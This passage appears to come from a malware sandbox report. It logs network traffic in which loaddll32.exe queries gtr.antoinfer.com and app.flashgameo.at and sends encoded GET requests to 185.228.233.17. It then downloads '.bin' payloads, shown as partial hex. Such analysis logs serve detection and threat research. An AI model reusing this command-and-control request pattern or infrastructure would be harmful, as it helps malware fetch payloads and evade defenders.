Aug 3, 2021 20:26:23.483272076 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.483311892 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.483340025 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.483349085 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.483392954 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.485507011 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.501308918 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.501360893 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.501457930 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.502315044 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.502405882 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.503424883 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.504914999 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.504964113 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.505047083 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.507354975 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.507452011 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.537898064 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.537925005 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.537941933 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.537960052 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.537972927 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.537977934 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.537993908 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.538014889 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.538058043 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.540869951 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.541744947 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.541763067 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.541836023 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.543317080 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.543373108 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.544511080 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.544538021 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.544591904 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.547049046 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.548182964 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.548291922 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.549451113 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.550648928 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.550710917 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.551738024 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.552970886 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.553093910 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.559031010 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.581469059 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.581492901 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.581604958 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.584155083 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.584182978 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.584295034 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.585287094 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.585313082 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.585407972 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.587693930 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.587791920 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.588885069 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.590306044 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.590328932 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.590377092 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.592648029 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.592677116 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.592791080 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.594965935 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.594994068 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.595117092 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.596180916 CEST	80	49722	185.228.233.17	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 20:25:04.401122093 CEST	54795	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:25:04.425739050 CEST	53	54795	8.8.8.8	192.168.2.5
Aug 3, 2021 20:25:05.656156063 CEST	49557	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:25:05.691215038 CEST	53	49557	8.8.8.8	192.168.2.5
Aug 3, 2021 20:25:07.152558088 CEST	61733	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:25:07.179940939 CEST	53	61733	8.8.8.8	192.168.2.5
Aug 3, 2021 20:25:07.566951990 CEST	65447	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:25:07.602358103 CEST	53	65447	8.8.8.8	192.168.2.5
Aug 3, 2021 20:25:09.376899958 CEST	52441	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:25:09.416753054 CEST	53	52441	8.8.8.8	192.168.2.5
Aug 3, 2021 20:25:11.443007946 CEST	62176	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:25:11.469674110 CEST	53	62176	8.8.8.8	192.168.2.5
Aug 3, 2021 20:25:12.513542891 CEST	59596	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:25:12.538500071 CEST	53	59596	8.8.8.8	192.168.2.5
Aug 3, 2021 20:25:41.911098003 CEST	65296	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:25:41.945909023 CEST	53	65296	8.8.8.8	192.168.2.5
Aug 3, 2021 20:25:59.831330061 CEST	63183	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:25:59.858827114 CEST	53	63183	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:00.391988039 CEST	60151	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:00.427555084 CEST	53	60151	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:01.178441048 CEST	56969	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:01.203408003 CEST	53	56969	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:01.540710926 CEST	55161	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:01.573338032 CEST	53	55161	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:01.855267048 CEST	54757	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:01.880338907 CEST	53	54757	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:02.606440067 CEST	49992	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:02.634169102 CEST	53	49992	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:03.818680048 CEST	60075	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:03.843698025 CEST	53	60075	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:22.778372049 CEST	55016	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:22.811264038 CEST	53	55016	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:23.997081995 CEST	64345	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:24.029594898 CEST	53	64345	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:25.273302078 CEST	57128	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:25.308423042 CEST	53	57128	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:33.792977095 CEST	54791	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:33.827280998 CEST	53	54791	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:35.145064116 CEST	50463	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:35.452040911 CEST	53	50463	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:36.974869013 CEST	50394	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:37.011106968 CEST	53	50394	8.8.8.8	192.168.2.5
Aug 3, 2021 20:26:48.340218067 CEST	58530	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:26:48.375884056 CEST	53	58530	8.8.8.8	192.168.2.5
Aug 3, 2021 20:27:01.567594051 CEST	53813	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:27:01.603158951 CEST	53	53813	8.8.8.8	192.168.2.5
Aug 3, 2021 20:27:49.153727055 CEST	63732	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:27:49.178484917 CEST	53	63732	8.8.8.8	192.168.2.5
Aug 3, 2021 20:27:49.343969107 CEST	57344	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:27:49.621628046 CEST	53	57344	8.8.8.8	192.168.2.5
Aug 3, 2021 20:27:50.228790045 CEST	54450	53	192.168.2.5	8.8.8.8
Aug 3, 2021 20:27:50.537127972 CEST	53	54450	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 20:26:22.778372049 CEST	192.168.2.5	8.8.8.8	0x16b2	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:26:23.997081995 CEST	192.168.2.5	8.8.8.8	0x864	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:26:25.273302078 CEST	192.168.2.5	8.8.8.8	0xdfb3	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:26:33.792977095 CEST	192.168.2.5	8.8.8.8	0x96c3	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:26:35.145064116 CEST	192.168.2.5	8.8.8.8	0x8e93	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:26:36.974869013 CEST	192.168.2.5	8.8.8.8	0x97c1	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:27:49.153727055 CEST	192.168.2.5	8.8.8.8	0xd7ad	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Aug 3, 2021 20:27:49.343969107 CEST	192.168.2.5	8.8.8.8	0xa0df	Standard query (0)	app.flashgameo.at	A (IP address)	IN (0x0001)
Aug 3, 2021 20:27:50.228790045 CEST	192.168.2.5	8.8.8.8	0xc2b	Standard query (0)	app.flashgameo.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 3, 2021 20:26:22.811264038 CEST	8.8.8.8	192.168.2.5	0x16b2	No error (0)	gtr.antoinfer.com	185.228.233.17	A (IP address)	IN (0x0001)
Aug 3, 2021 20:26:24.029594898 CEST	8.8.8.8	192.168.2.5	0x864	No error (0)	gtr.antoinfer.com	185.228.233.17	A (IP address)	IN (0x0001)
Aug 3, 2021 20:26:25.308423042 CEST	8.8.8.8	192.168.2.5	0xdfb3	No error (0)	gtr.antoinfer.com	185.228.233.17	A (IP address)	IN (0x0001)
Aug 3, 2021 20:26:33.827280998 CEST	8.8.8.8	192.168.2.5	0x96c3	No error (0)	gtr.antoinfer.com	185.228.233.17	A (IP address)	IN (0x0001)
Aug 3, 2021 20:26:35.452040911 CEST	8.8.8.8	192.168.2.5	0x8e93	No error (0)	gtr.antoinfer.com	185.228.233.17	A (IP address)	IN (0x0001)
Aug 3, 2021 20:26:37.011106968 CEST	8.8.8.8	192.168.2.5	0x97c1	No error (0)	gtr.antoinfer.com	185.228.233.17	A (IP address)	IN (0x0001)
Aug 3, 2021 20:27:49.178484917 CEST	8.8.8.8	192.168.2.5	0xd7ad	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Aug 3, 2021 20:27:49.621628046 CEST	8.8.8.8	192.168.2.5	0xa0df	No error (0)	app.flashgameo.at	185.228.233.17	A (IP address)	IN (0x0001)
Aug 3, 2021 20:27:50.537127972 CEST	8.8.8.8	192.168.2.5	0xc2b	No error (0)	app.flashgameo.at	185.228.233.17	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

gtr.antoinfer.com

app.flashgameo.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49722	185.228.233.17	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:26:22.893517971 CEST	1195	OUT	GET /FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Aug 3, 2021 20:26:23.422147989 CEST	1196	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 03 Aug 2021 18:26:23 GMT Content-Type: application/octet-stream Content-Length: 194716 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="61098a4f5c0d8.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: b0 0f 98 92 d9 2f 37 fa 2a 44 78 6a 16 79 e1 e6 5a b1 46 45 37 b2 fa a3 3a 0e af f7 e6 fc b9 86 58 2a 7d 47 93 08 7e 22 15 7d 96 d2 f3 e9 29 e8 a6 76 28 45 a5 b4 8a 05 c6 eb 38 37 5d 7f d8 93 01 d0 69 e7 fb db 8a ca 43 e1 a1 dd 2d 07 7c 70 d1 3c e6 41 3c f7 67 f5 63 e7 a5 b4 64 0f b2 f6 d5 1c 1a d5 ba 84 32 68 4a d2 49 fa 0e e4 e8 fb eb c1 97 23 10 cd 7e 1a 64 5a ec 8c d9 6f f1 7d 92 ea 3a 33 22 41 9f 1c 8d 75 43 eb 60 41 f4 ac 26 24 9c 9c 0b 68 79 50 90 7b 16 2e ab 87 f0 7f 1c 62 c4 8b 3b 06 7f bd a3 4e 2b f6 c4 bc 55 e6 6c cc 7a 59 4a ef 66 0e 12 4f 23 57 24 fc 2a e3 ff fe e7 c2 48 a3 96 42 b3 08 d6 c9 e2 ca d5 ea a3 eb f6 f8 05 42 51 61 73 04 44 55 ea 58 ce e3 5a 54 55 54 f3 a0 5a a5 06 38 5c 1f 16 53 ad c8 c3 92 98 e6 28 a0 05 77 8e d9 0f b2 31 ff 43 2b 5c c8 c5 5a 1d 23 3d 1a e6 7c 36 1d c4 8f f5 47 21 2b fa 12 1d cb 2c 60 26 6a 09 92 44 65 cf 6f d3 2e ef 72 8a 29 1b 4b bc 6b cb e8 11 10 fd bf 36 57 95 af 43 5d f0 73 4c 8a 7b 99 85 d5 51 8c b1 c5 2d 19 41 7f 45 43 0a da b2 19 6c 49 ed 90 66 6c 95 d7 07 cb 8f be 6d 74 fb 57 9e a9 df 80 f3 9c 82 d6 db 11 58 69 b1 ba df 28 92 1f c7 ec 3e f3 46 db 41 93 bd 72 2a 79 13 e0 31 b6 02 4c 18 b3 f8 3a 34 42 f7 2b 10 93 d1 41 5a 67 bd 3c db 79 36 f8 6e f6 9b 61 5d 94 1f d6 e9 c9 03 1b 89 96 ad a5 90 28 5d 19 c5 7c fe 93 25 15 b0 17 cc 6f d5 43 72 bf 1e 2f 78 21 f1 a2 9a 27 db 0e d2 51 54 ec 00 f7 ab e3 24 61 0c db 60 43 d3 f2 ee 0d a4 75 bd 4f d9 ad a8 b2 9f f3 9b 69 d8 3d 97 cc 6d 9f 37 bb e6 c5 b7 10 6b 9b ce f6 e7 6b 58 2f 7f f3 a1 f5 11 40 86 49 ab 9e b0 c2 a4 d1 7d da 93 80 e6 07 9c 62 50 43 70 32 da 28 9d b2 22 71 a9 4e 41 44 13 c1 0e 0f e3 94 60 d0 a8 2b e9 97 8e b4 df 6b 42 ef 8e 01 13 22 cf dd 25 3b ec bf 8c d0 92 98 e5 eb 07 a1 43 96 c2 62 36 a1 44 50 e8 ed 08 6e 52 4e 88 99 9e e7 86 d5 99 bc 0b 93 bb 11 6b 43 2e 27 ad 3f d6 c7 b0 9e dd 36 bf a9 11 2f 65 05 a6 62 8f 27 da af d8 fe b7 c5 39 d6 3d f3 af 6c 50 4a 90 94 39 89 04 8d a3 a3 f3 94 e4 d5 1e 3c 5c 5f d6 02 00 67 a9 76 a1 64 bf ad 0c d1 23 e1 19 95 cc 2f c8 7e 97 93 73 4c b9 8e 17 8f 9e b1 5e 74 78 f2 17 7e 78 64 30 04 b2 7b fd e1 79 66 c5 b5 14 df 9a 8e 55 5a d4 c8 db 6e 92 e6 ca 22 9e b2 30 50 3d 69 7d bc 07 f7 4f 53 3f e6 ca 7d 65 af f0 7d 93 2e 51 4c 63 4b 4f 2f 48 c7 d3 af d5 19 26 ae a3 d9 2d 67 1d 56 f7 32 36 7e ac 4e 2a 5f bd 8d 09 99 a8 ec 94 44 7b 18 c3 46 77 dd bb de 93 bb 91 12 79 49 8d 41 7e 0f ee 2d 00 29 ca 74 ff a6 4e 9d 85 52 50 8c e2 cd a0 2e 03 25 3c 8d c4 a7 0f 4f 4e fd bd 1f ed eb 24 65 61 09 6f 4d f7 e6 16 e2 01 32 32 b9 41 23 66 4f a4 9e 82 86 64 c5 c7 4d 43 a4 d6 8e 51 63 ab d3 6e aa 85 0d 43 6e 4f d3 e6 ea 35 0e 53 cb 1a 04 2b 67 43 71 a9 8d c1 2d 24 1e 35 0b 02 ca 72 00 1c 7e c0 6e 37 9d 6d ca 91 70 7d ec 2e 8c a6 28 0a 39 e2 d6 68 a4 f2 f2 14 cc 24 9c e6 b9 4b 3b 81 10 61 Data Ascii: /7DxjyZFE7:X}G~"})v(E87]iC-\|p<A<gcd2hJI#~dZo}:3"AuC`A&$hyP{.b;N+UlzYJfO#W$HBBQasDUXZTUTZ8\S(w1C+\Z#=\|6G!+,`&jDeo.r)Kk6WC]sL{Q-AEClIflmtWXi(>FAry1L:4B+AZg<y6na](]\|%oCr/x!'QT$a`CuOi=m7kkX/@I}bPCp2("qNAD`+kB"%;Cb6DPnRNkC.'?6/eb'9=lPJ9<\_gvd#/~sL^tx~xd0{yfUZn"0P=i}OS?}e}.QLcKO/H&-gV26~N*_D{FwyIA~-)tNRP.%<ON$eaoM22A#fOdMCQcnCnO5S+gCq-$5r~n7mp}.(9h$K;a

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49723	185.228.233.17	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:26:24.097242117 CEST	1399	OUT	GET /xeokJbRqOl3gRd/X3OYN3TXIyfP1rKJadFox/hkDEMFqGc3z5N0jb/OSe88cYQHbyuSyF/L_2BGXtQlRaEWOYgGy/iGe9pg_2B/kC4LmyHng_2FvJ1rpXvU/r_2BZHx4cR2W2aSgMrL/JfmqfENA8zSGFufIIE0hzo/19OQbirroLXoz/7woD_2Fn/PEok8EnxPZROEqPbm_2BBd4/HH8ql3GbQ8/5Mk8GmbHI0E_2BK8q/0FGuRwkqUf0g/VJJie0BY_2B/zf4uXegc1oUq1M/kGjn1PvLWjrBuIQHmv_2B/3Va8kJS9ZeQUj30z/_2FoWBI8OFd1rcBCCFd/6 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Aug 3, 2021 20:26:24.632517099 CEST	1400	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 03 Aug 2021 18:26:24 GMT Content-Type: application/octet-stream Content-Length: 247966 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="61098a508f971.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 89 d6 f2 27 b9 43 a7 fd f1 9e 9c 7a ac b2 56 33 c6 37 0c 17 d9 36 1d 09 ab 0f e5 b2 cc 32 35 4f 2c 82 78 ba 0d 4c 22 c2 65 d9 25 df 8f ed d7 1d df ff 0d b5 19 39 08 68 c6 1f 5b 77 11 64 a4 38 8e 0d ef 2e d4 db 88 ec 73 f2 30 8a ff 40 fc 5f 25 ce ac d7 e4 57 a1 97 5c b6 41 a9 8d 12 12 55 b1 3b 8a f2 e3 42 fe 27 05 8a 95 fe 30 22 6a 62 96 07 98 87 67 e2 c5 14 81 03 3d da 3c 66 24 7a 67 79 1c 54 05 9e ee 20 73 5b e5 0a 47 39 6a bd 62 81 71 37 04 c1 f6 34 54 f2 86 81 5d c4 43 b7 bb f9 b3 1b 27 09 ae 3c fc fb 4e 43 4c b0 ed 0b 54 a8 14 06 39 95 f5 63 37 50 8d b7 a0 cf d8 da 32 10 81 64 7c 85 df 1b 97 47 a7 cd 27 d2 d4 c5 cd 07 19 a0 a9 e3 7a 9c e9 28 41 59 54 d9 a0 fe 88 64 62 cd 17 b0 89 9e 9f b3 d2 2d c9 62 3e a8 88 a0 89 6b 2a be 9a ca 02 fc fa 31 3e 83 92 3b 9a af c3 0f de 9b 36 11 47 fc e6 c0 c0 4b e8 3f 44 2e d0 b7 b0 1d f3 5c a3 42 5c f3 53 92 cb 1f 16 c2 36 8a c3 38 55 71 ba 77 58 85 cb 0c 59 d9 77 c3 a8 8e 9a cd f5 a2 51 54 27 72 c8 46 d4 5c 30 45 19 6a f7 7c 59 08 5e 02 92 3e 94 04 62 8b 60 b3 8d da a4 90 2f c9 57 63 26 ab 52 8f ca c6 fd ac c9 37 04 bb 6b 5b fb 59 c3 50 0c df 81 60 bc 16 be ec 32 13 67 bd e2 46 27 8c 4b 57 58 b6 90 5e cc 2d f6 61 fb 48 91 24 4d 54 55 7d 88 9f 66 98 e7 e6 0c 28 17 c7 20 60 c8 12 c4 35 10 4c dd db 66 df 22 68 ff c9 31 7d 6c bd 2e 0b e7 47 04 89 29 76 7a 19 d0 ea ae 45 d8 bc 14 07 fb 0c 42 df 9c 7a ab 40 85 a9 f8 77 f2 7d ba c2 84 98 64 95 18 02 be 46 98 a0 31 b8 47 0f 7a 63 cb ff d1 1d 06 a7 f0 1c c0 e7 70 d7 0c c5 08 89 8f 6c 48 cb 1b e7 87 1d 66 20 6b 07 6d ef 2b d3 05 f1 7b 7f 37 87 57 e2 e4 d2 24 35 a8 ec 66 1f cc 97 84 e6 2c f8 37 fd 4a 67 85 15 da a3 dc a7 f6 c3 63 cb 0a b1 d6 06 88 99 61 3c aa a3 d9 9b c0 0d 3c b6 42 cf ad 4b 08 dd 41 c8 8d 45 9e 19 eb ef 6e 77 74 5c 04 05 4c cb 65 3e b5 aa a0 c3 1e 5d 88 3e 2e 46 82 35 b1 5b 60 64 3b bf 68 0a 6d fa b9 15 c1 53 82 86 d7 a0 af 8c f9 f6 2e 8a e3 97 f0 6f 9d 84 e8 71 64 0d 7f 44 8d a1 6d 83 41 51 c8 17 c1 e1 2e 63 9d 1d 57 7e 7c d7 46 70 b4 1a 5f 26 31 1d ca b0 8b 27 f3 b6 41 d8 55 99 eb da 70 66 82 39 49 bf e8 69 24 38 8b ca b9 82 6a 58 53 e2 b4 dc b0 ee 14 91 df 9a 90 fe 34 f5 bb 1d 11 5e 88 25 9d 6c 77 22 c7 fe 70 3a a6 d7 b2 f5 d9 58 f1 37 1f 61 d7 62 c5 ec 1e 4b 0e 67 98 7b ae 55 a1 e4 3f a8 30 2b bd 72 8b a6 04 21 ef 0b 33 08 49 61 53 a0 31 99 25 71 44 bd 4c 08 cc c3 00 36 bc 31 94 03 41 8f 52 8c 34 96 01 6a 93 d1 29 8e 29 72 8a 76 50 4d 12 25 67 db ce a1 e1 97 82 78 57 4e 60 3c c7 88 c5 e9 8b da d9 bd b0 cb 9f 58 8c 42 6a 57 f0 f0 4d 47 95 68 1a e2 1e d5 aa 46 99 d9 6c 69 17 6e 92 72 f0 c3 88 3d d5 fb 77 f1 4d d0 19 8e c7 14 35 00 7b 72 97 70 ea 30 bb df de 69 5f d8 3d 71 24 cb da c2 a1 a8 5d 90 53 31 4b 20 50 76 a5 f3 6d f8 a6 90 47 e7 c8 b2 80 07 2f 16 be ac f8 5d df 87 35 8a b0 f3 c3 b4 90 87 92 96 8e af b9 Data Ascii: 'CzV37625O,xL"e%9h[wd8.s0@_%W\AU;B'0"jbg=<f$zgyT s[G9jbq74T]C'<NCLT9c7P2d\|G'z(AYTdb-b>k*1>;6GK?D.\B\S68UqwXYwQT'rF\0Ej\|Y^>b`/Wc&R7k[YP`2gF'KWX^-aH$MTU}f( `5Lf"h1}l.G)vzEBz@w}dF1GzcplHf km+{7W$5f,7Jgca<<BKAEnwt\Le>]>.F5[`d;hmS.oqdDmAQ.cW~\|Fp_&1'AUpf9Ii$8jXS4^%lw"p:X7abKg{U?0+r!3IaS1%qDL61AR4j))rvPM%gxWN`<XBjWMGhFlinr=wM5{rp0i_=q$]S1K PvmG/]5

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49724	185.228.233.17	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:26:25.371167898 CEST	1659	OUT	GET /DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Aug 3, 2021 20:26:25.941195965 CEST	1660	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 03 Aug 2021 18:26:25 GMT Content-Type: application/octet-stream Content-Length: 1958 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="61098a51d942e.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 87 83 b8 e8 e8 95 f2 1c 21 02 21 fc 35 53 58 88 38 4a 37 95 60 5b 9e ec 33 4f 88 5c 7e 78 8f 15 50 60 d9 00 fc 99 ab 94 86 e1 18 30 10 9a 9d 14 35 9e 83 22 5f d2 ba 8e b0 39 4c 04 7d c2 47 ff 9c 7c d2 af 8a 33 6b 1e 84 21 c2 0a e1 47 0e e5 27 ad a7 63 fe 96 77 f7 07 42 35 88 30 4f c7 fa 8d c4 ae 04 aa 28 29 0e 68 23 a7 fe 75 e3 72 4c 62 6d a5 0b e3 aa ea 7d 95 87 04 26 5f 6f e3 3e 4c d4 c7 d9 aa 01 50 74 6f a0 c9 a5 ab 95 6d bb 08 1d b8 af 7c 63 